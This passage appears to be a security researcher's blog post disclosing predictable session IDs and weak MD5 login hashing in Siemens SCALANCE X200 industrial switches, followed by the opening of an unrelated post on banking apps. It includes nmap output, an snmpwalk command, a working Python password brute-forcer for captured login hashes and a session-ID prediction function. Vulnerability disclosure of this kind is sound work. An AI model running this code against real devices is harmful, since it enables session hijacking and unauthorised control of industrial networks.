22/tcp  open  ssh      OpenSSH 4.2 (protocol 2.0)
|_ssh-hostkey: 1024 cd:b4:33:49:62:3b:58:1a:67:5a:a3:f0:50:00:71:86 (RSA)
23/tcp  open  telnet?
80/tcp  open  http     WindWeb 4.00
|_http-methods: No Allow or Public header in OPTIONS response (status
code 501)
|_http-title: Logon to SCALANCE X Management (192.168.0.5)
84/tcp  open  ctf?
111/tcp open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|_  100000  2            111/udp  rpcbind
443/tcp open  ssl/http WindWeb 4.00
|_http-methods: No Allow or Public header in OPTIONS response (status
code 501)
|_http-title: Logon to SCALANCE X Management (192.168.0.5)
| ssl-cert: Subject: organizationName=Siemens
AG/stateOrProvinceName=BW/countryName=DE
| Not valid before: 2008-02-04T14:05:57+00:00
|_Not valid after:  2038-01-18T14:05:57+00:00
|_ssl-date: 1970-01-01T00:14:20+00:00; -43y254d14h08m05s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
MAC Address: 00:0E:8C:A3:4E:CF (Siemens AG A&D ET)
Device type: general purpose
Running: Wind River VxWorks
OS CPE: cpe:/o:windriver:vxworks
OS details: VxWorks
Network Distance: 1 hop
 
So we have a variety of management interfaces to choose from: Telnet (really in 2014?!?), SSH, HTTP, and HTTPS. All of these interfaces share the same users and default passwords you would expect, but we are looking for something more meaningful. 
 
Now that we’ve found them on Shodan (wait, they’re all air-gapped, right?), we quickly learn from the web interface that there are only two users: admin and user. Next we view the web page source and search for “password” which gives us this lovely snippet:
 
document.submitForm.encoded.value = document.logonForm.username.value + ":" + md5(document.logonForm.username.value + ":" + document.logonForm.password.value + ":" + document.submitForm.nonceA.value)
 
 
This is equivalent to the following command on Linux:
 
echo -n "admin:admin:C0A8006500005F31" | md5sum
 
 
Which is then posted to the device in a form such as this (although this one has a different password*):
 
encoded=admin%3Aafc0dc177659c8e9d72dec8a3c68650e&nonceA=C0A800610000CE29
 
Setting aside just how weak the use of MD5 is (in fact, I have written a script to brute-force credentials snatched off the wire), that nonceA value is very important. A nonce is a "number used once", typically employed to prevent cryptographic replay attacks. In other words, this random challenge value is provided by the server to keep an attacker from simply capturing the hash on the wire and replaying it to the server later when they want to log in. This nonce, then, deserves our attention.
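To see why MD5 with an observable nonce offers so little protection, here is a minimal sketch of the off-the-wire brute force. This is not the script mentioned above, just the same idea in a few lines: the username, nonce, and "encoded" hash come straight out of the captured login POST shown earlier, and the wordlist is a placeholder.

import hashlib

username = "admin"
nonce = "C0A800610000CE29"                     # nonceA from the POST
captured = "afc0dc177659c8e9d72dec8a3c68650e"  # hash from the POST

wordlist = ["admin", "password", "scalance", "siemens"]  # placeholder list

for candidate in wordlist:
    digest = hashlib.md5(f"{username}:{candidate}:{nonce}".encode()).hexdigest()
    if digest == captured:
        print("password found:", candidate)
        break
else:
    print("not in wordlist")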
 
It appears that this is an ID field in the cookie, and that it is also the session ID. If I can predict session IDs, I can perform session hijacking while someone is managing the switch. So we set about estimating the entropy of this session ID, which initially appears to be 16 hex characters. However, we won't even need to create an equation, since it turns out to be COMPLETELY predictable, as you will soon see.
 
We can use WGET to fetch the page a few times and get a small sample of these nonceA values. This is what we see:
 
C0A8006500005F31,C0A8006500001A21,C0A8006500000960,C0A80065000049A6
 
This seems distinctly non-random. In fact, when I measured it more precisely, it became clear that it was sequential! A little further investigation revealed that SNMP is sometimes available to us. So we use snmpwalk on one of the devices I have at home:
 
snmpwalk -Os -c public -v 1 192.168.0.5
iso.3.6.1.2.1.1.1.0 = STRING: "Siemens, SIMATIC NET, SCALANCE X204-2,
6GK5 204-2BB10-2AA3, HW: 4, FW: V4.03"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.4196.1.1.5.2.22
iso.3.6.1.2.1.1.3.0 = Timeticks: (471614) 1:18:36.14
 
Well look at that! 
 
471614 in base 10 = 7323E in hex! I wonder if the session ID is simply the uptime in hex?
 
We do a WGET at approximately the same time and get this as a session ID:
 
C0A800610007323F
 
So if we assume the last 8 hex characters are the uptime in hex (or at least close enough for us to brute-force the few values around it), then where do the first 8 hex characters come from?
 
I initially imagined they were unique to each device and set out to test that theory by getting a session ID from another device found on Shodan. Keep in mind I did not attempt a login; I just fetched the page to see what the session ID was. Sure enough it was different, but the one from the switch I have wasn't the MAC address or any other unique identifier on the switch. I spent a week missing the point here, but luckily I have excellent company at IOActive Labs.
 
It was during discussions with my esteemed colleague Reid Wightman that the answer emerged: he suggested it was an IP address, pointing out that C0 and A8 are 192 and 168 in decimal. So I went and checked the IP address of the switch I have, and it was not 192.168.0.97. Again I was stumped, until I realized it was the IP address of my own client machine!
 
In other words, nonceA is simply the address of the web client connecting to the switch (converted to hex), concatenated with the uptime of the switch (in hex). I can practically see the developer who thought this would be a good idea. I can hear them thinking that each session is clearly distinguished by the address it is connecting from, and made impossible to brute-force by time. Time + space, that's too large to brute-force or estimate, right? You must admit, it has a kind of perverse logic to it. Unfortunately, it is highly predictable and insecure.
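Putting the two observations together, predicting a session ID takes nothing more than the victim client's IP address and the switch's uptime (readable over SNMP, as shown above). A minimal sketch of the construction, using the values observed earlier:

def predict_session_id(client_ip: str, uptime_ticks: int) -> str:
    # Client IP octets in hex, concatenated with uptime as 8 hex digits.
    ip_hex = "".join(f"{int(octet):02X}" for octet in client_ip.split("."))
    return ip_hex + f"{uptime_ticks:08X}"

# 192.168.0.97 at 0x7323F ticks -> C0A800610007323F, matching the sample.
print(predict_session_id("192.168.0.97", 0x7323F))

# A real hijack would try a small window of tick values around the SNMP
# reading, since uptime advances between the query and the attempt.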
 
Go home, Scalance X200 family session IDs, you're drunk. Aside from being completely predictable, they are too small: 16 hex characters gives only 64 bits, much of it guessable, which is a far cry from the 128 bits recommended by OWASP.
 
I guess that’s what they refer to in this announcement with the phrases “A potential vulnerability” and “that might allow attackers to hijack web sessions over the network without authentication”. 
 
There are a few more vulnerabilities to discuss about this switch, but to learn about those, you’ll have to see me at S4x14, or wait for the next blog post where I release a more reliable POC.
 
Usually I am one to organise a nice quiet coordinated disclosure, probably over a lavender scone and a cup of tea. I do my best to be polite, cheerful, and helpful, though I am under no obligation to do so, and there are considerable financial incentives for a researcher never to report a vulnerability at all.
 
Siemens Product CERT should be commended for being polite and helpful, and relatively quick with this fix. They acknowledged my work and communicated clear timelines of when to expect a fix. This is precisely how they should go about communicating with us in the research community. It was at this point that I informed the good folks over at Siemens that I would verify the patch on September 12th. On the morning of the 12th, I tried to log in to verify the patch they had provided, and found myself blocked from doing so.
 
 
Should a firmware release with security implications only be downloadable in a forum that requires vetting and manual processing? Is it acceptable to end users that security patches are under export restriction?
 
Luckily these bans were lifted later that day, and I was able to confirm the fixes. I would like to commend the Siemens Product CERT team for fixing these issues rapidly and with great professionalism. They communicated with me securely using GPG-encrypted emails, set realistic timelines, and gave me feedback when those timelines didn't work out. This leads me to a formal challenge based on their performance.
 
I challenge any other ICS vendor to match Siemens' laudable response times and produce patches within three months for any externally submitted security vulnerabilities.
 
Stay tuned for part 2 where we release the simple Python script for authentication bypass which allows firmware and configuration upload and download.
 
*If you can crack this, and are interested in a job, please send IOActive your CV and the cleartext password used to create that credential. It is not hard, but it might take you a while….
INSIGHTS | January 8, 2014

Personal banking apps leak info through phone

For several years I have been reading about flaws in home banking apps, but I remained skeptical. To be honest, when I started this research I was not expecting to find any significant results. The goal was to perform black-box and static analysis of mobile home banking apps from around the world. The research used iPhone/iPad devices to test a total of 40 home banking apps from the top 60 most influential banks in the world.
